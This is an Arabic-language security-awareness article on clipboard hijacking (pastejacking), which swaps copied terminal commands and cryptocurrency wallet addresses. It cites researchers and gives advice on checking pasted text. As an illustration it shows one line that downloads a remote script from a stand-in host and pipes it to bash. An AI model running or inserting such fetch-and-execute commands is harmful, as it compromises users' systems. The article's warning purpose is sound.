اهلا وسهلا بيكم معنا اليوم
نصائح أمن معلومات للتجنب من مخاطر اختراق جهازك ومحفظتك
لو انت من هواة النسخ واللصق العميانى، او من الناس اللى ليها فى العملات الرقمية وبعمل تحويلات سواء على الموبايل او على الكمبيوتر، حاول بقدر الامكان وانت بتنسخ عنوان المحظفة اللى هتحولها او هتحول منها او اى كان انك تتأكد من العنوان اللى انت بتنسخة ودا حفاظا عليك من حاجه اسمها Clipboard Hijacking او هجوم المحفظة الخاصة بالنسخ واللصق (على اى نظام تشغيل)، الفكرة انك لما بتنسخ نص معين copy النص دا علشان يفضل موجود لحد ما تحتاجة بيروح مكان سواء فى الكمبيوتر او التليفون اسمه "المحفظة"، المحفظة دى المكان اللى بيتم تخزين فيه اى نص او كائن object (ملف، صورة، فيديو، الخ..) ولما بتقوم بعملية اللصق paste بيقوم نظام التشغيل عميانى كدا واخد محتويات المحفظة دى وبيحطها فى المكان اللى انت عملت فيه اللصق، ليه تاخد بالك؟
ظهرت فى الاونة الاخيرة هجوم معروف بإسم Paste Jacking او Clipboard Hijacking (كلهم ليهم نفس المعنى بس المسمى مختلف) الهجوم دا بيقوم بشكل "ذكى" بإستبدال محتويات المحفظة "اللى بيتم حفظ فيها الشئ المنسوخ زى ما وضحنا"، ليه قولنا بشكل ذكى؟ لأن اللى بيقوم بإعتراض عملية اللصق او استبدال النسخ بيقوم الاول يشوف هوا ايه الشئ اللى انت نسخته؟ هل هوا امر terminal او command line؟ لو هما اوامر (زى ما معظم الناس بتقوم واخده كود او امر معين وتعمل نسخ ولصق من حاجه زى StackOverflow مثلا) بيقوم بإستبدال الامر replace او الحاق جزء غريب بداخله append، طيب تخيل معايا مثلا انت نسخت امر زى:
ping google.com -c 2
وقوم بشكل ما عملت لصق فى ال terminal او ال command line وهوب لقيت النص اللى اتلصق دا التالى:
curl -s https://BLAH.com/a.sh | bash && ping google.com -c 2
اللى ممكن يحصل فى المثال اللى فات انك فى الاول هتقوم بتنزيل باش سكريبت وتنفيذه بعدين هيتنفذ الامر اللى انت عايزه، الجميل فى الموضوع ان زرار الانتر انت لسه مضغطش عليه علشان يتنفذ الامر الخبيث الاخير دا، لكن اللى نفذ الهجوم دا عليك "الحق appended" ما يعرف ب CRLF او Carriage Return Line Feed ودا للناس اللى متعرفش عباره عن character او تعليمة فى نهاية السطر (انت كبنى ادم مش هتشوفها لكن الكمبيوتر هيفهمها انها الزار Enter على لوحة المفاتيح وهينفذها بدون الرجوع ليك) وبالتالى هو المطلوب اثباته.
اضغط التالي لاستكمال القراءه
↚
طب بالنسبة للشق التانى الناس اللى مهتمه بالعملات الرقمية؟ طبعا "اى حد بينسخ ويلصق عميانى سواء فى التليفون او فى الكمبيوتر ياريت متعملش دا وتتأكد من اى شئ انت نسخته الاول قبل لصقة" ممكن تعمل دا مثلا انك تفتح نوت فاضيه وتلصق فيها الكلام دا تشوف الاول ايه اللى بيحصل، لقيت كل شئ ماشى تمام كمل العملية (ولو ان دا مش هيحميك بردو ركز فى المثال اللى جاى هتعرف ليه)، اللى حصل انك لو من هواة العملات الرقمية وصداف انك بردو من هواة النسخ واللصق العميانى مثلا انت محتاج تدفع شئ وليكن خلينا نقول بالبيت كوين، طبعا بتفتح الابلكيشن عادى جدا اللى انت عليه فلوسك، بتقوم محدد المبلغ فاضل ايه؟ اه، المرسل اليه، هوب اخدت عنوان المحفظة المرسل اليها "نسخ" وقومت رجعت للتطبيق تانى اللى عليه فلوسك وعملت "لصق" وعميانى عملت "ارسال"، هوب الفلوس موصلتش للشخص اللى انت باعتله عارف ليه؟ علشان عندك حاجه اسمها Clipboard Hijacker ودا كل اللى بيعمله انه يبص على الموجود فى المحفظة الخاصة بنظام التشغيل وليكن Android ليه ذكرت اندرويد؟ علشان دا متقدرش تعمله فى iOS، او مش بسهوله يعنى، المهم نكمل، اللى حصل ان الهاى جاكر دا قام مستبدل العنوان الخاص بالمرسل وغيره للعنوان الخاص بالمهاجم وهوب فلوسك راحت للمهاجم، طلبعا لية ال Hijacker دا ذكى؟ لأنه بيفهم نوع النص اللى انت نسخته وبالتالى بيستبدله بشكل ذكى علشان حضرتك متشكش.
عايز تعرف اكتر؟ بص على الفديو دا: https://seekurity.com/services/goto/6b الخاص بالباحث الامنى Lukas Stefanko اللى اكتشف ان فى واحد من تطبيقات اندرويد المصيبه الاكبر انه موجود على متجر تطبيقات جوجل الرسمى Google Play وبيعمل نفس المصيبه لو حصل ونزل عندك، على فكرة دا اول تطبيق فريد من نوعه يتم اكتشافه على Google Play بيعمل الحركة المجرمة دى.
على اندرويد الموضوع حديث نسبياً، انما على مستوى انظمة التشغيل فى الكمبيوتر هجوم زى دا مش جدي، بيرجع اكتشافه لعام ٢٠١٦ بواسطة الباحث الامنى Dylan Ayrey واللى قام بنشر طرق استغلاله تقدر تقرا عن الهجوم فى الموضوع دا: https://seekurity.com/services/goto/6c
لاتنسي مشاركه الموضوع مع اصدقائك